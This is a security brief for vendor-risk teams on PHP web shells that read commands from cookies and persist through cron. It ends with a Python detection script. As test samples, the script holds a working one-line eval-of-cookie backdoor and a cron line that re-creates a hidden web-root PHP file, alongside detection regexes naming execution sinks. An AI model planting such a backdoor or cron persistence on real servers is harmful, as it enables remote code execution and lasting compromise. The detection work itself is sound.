Cookie‑Controlled PHP Web Shells Enable Persistent Remote Code Execution on Linux Servers
What Happened — Microsoft Defender Security Research uncovered a new attacker technique that embeds command‑and‑control logic in HTTP cookies. The malicious PHP web shells run on Linux web servers and use the cookie values to trigger remote code execution, persisting via cron jobs to survive reboots.
Why It Matters for TPRM —
- The method bypasses traditional URL‑parameter filtering and can evade many web‑application firewalls.
- Persistence through cron makes detection harder, increasing the window of exposure for third‑party services.
- Any SaaS, hosting, or managed‑service provider that runs PHP on Linux is a potential attack surface.
Who Is Affected — Cloud hosting providers, managed service providers (MSPs), SaaS platforms, and any organization that runs PHP‑based web applications on Linux servers.
Recommended Actions —
- Review contracts with vendors that host PHP applications for evidence of secure coding and hardening practices.
- Verify that vendors monitor for anomalous cookie values and have runtime integrity checks for cron jobs.
- Require regular scanning for unauthorized web shells and enforce least‑privilege execution contexts.
Technical Notes — Attackers embed a lightweight PHP backdoor that reads a specific cookie (the name X-Auth-Token is illustrative; any cookie name can be used) and executes its base64‑decoded payload. Persistence is achieved by installing a cron entry that re‑creates the shell if it is removed. Because default web‑server access logs do not record Cookie headers, detection depends on integrity monitoring of the web root and of crontabs rather than on request logs. No CVE is cited; the technique exploits standard PHP functionality and default cron configurations. Source: The Hacker News
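As an added example (not code from the Microsoft or Hacker News write‑ups), the following Python triage script implements detection heuristics for the two indicators described in the notes: a PHP file that couples a $_COOKIE read with base64_decode and an execution sink, and a cron entry that writes a .php file into a web root. The cookie name, file paths, web‑root list and sample inputs are constructed for the example.

```python
import re

# Three co-occurring indicators of the cookie-controlled backdoor pattern:
# a $_COOKIE read, a base64_decode call and a code/command execution sink.
COOKIE_READ = re.compile(r'\$_COOKIE\s*\[')
DECODE = re.compile(r'\bbase64_decode\s*\(', re.I)
EXEC_SINK = re.compile(
    r'\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(', re.I)

# Cron persistence heuristic: a job that (re)writes a .php file under a
# document root. Constructed list; adjust to the host's actual web roots.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
CRON_WRITE = re.compile(
    r'\b(echo|printf|cp|curl|wget|cat|tee)\b.*(>|-o|-O|tee)\s*\S*\.php\b', re.I)


def scan_php(source: str) -> dict:
    """Report which indicators a PHP source string contains; 'suspicious'
    is set only when all three co-occur, which keeps benign cookie use
    (e.g. a language preference) out of the findings."""
    hits = {
        "cookie_read": bool(COOKIE_READ.search(source)),
        "base64_decode": bool(DECODE.search(source)),
        "exec_sink": bool(EXEC_SINK.search(source)),
    }
    hits["suspicious"] = all(hits.values())
    return hits


def scan_crontab(crontab: str) -> list:
    """Return crontab lines that write a .php file into a known web root."""
    flagged = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if CRON_WRITE.search(line) and any(root in line for root in WEB_ROOTS):
            flagged.append(line)
    return flagged


# Constructed samples: one backdoor-shaped file, one benign cookie user,
# and a crontab with one legitimate job and one re-creation job.
SAMPLE_BACKDOOR = '<?php @eval(base64_decode($_COOKIE["X-Auth-Token"])); ?>'
SAMPLE_BENIGN = '<?php $lang = $_COOKIE["lang"] ?? "en"; echo htmlspecialchars($lang); ?>'
SAMPLE_CRONTAB = """# constructed crontab for the example
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * [ -f /var/www/html/.cache.php ] || echo 'BASE64_PLACEHOLDER' | base64 -d > /var/www/html/.cache.php
"""

if __name__ == "__main__":
    print(scan_php(SAMPLE_BACKDOOR), scan_php(SAMPLE_BENIGN))
    print(scan_crontab(SAMPLE_CRONTAB))
```

Run it against a real host by feeding each file under the web root to scan_php and the output of `crontab -l` for each user (plus /etc/cron.d) to scan_crontab; treat hits as leads for manual review, not as proof.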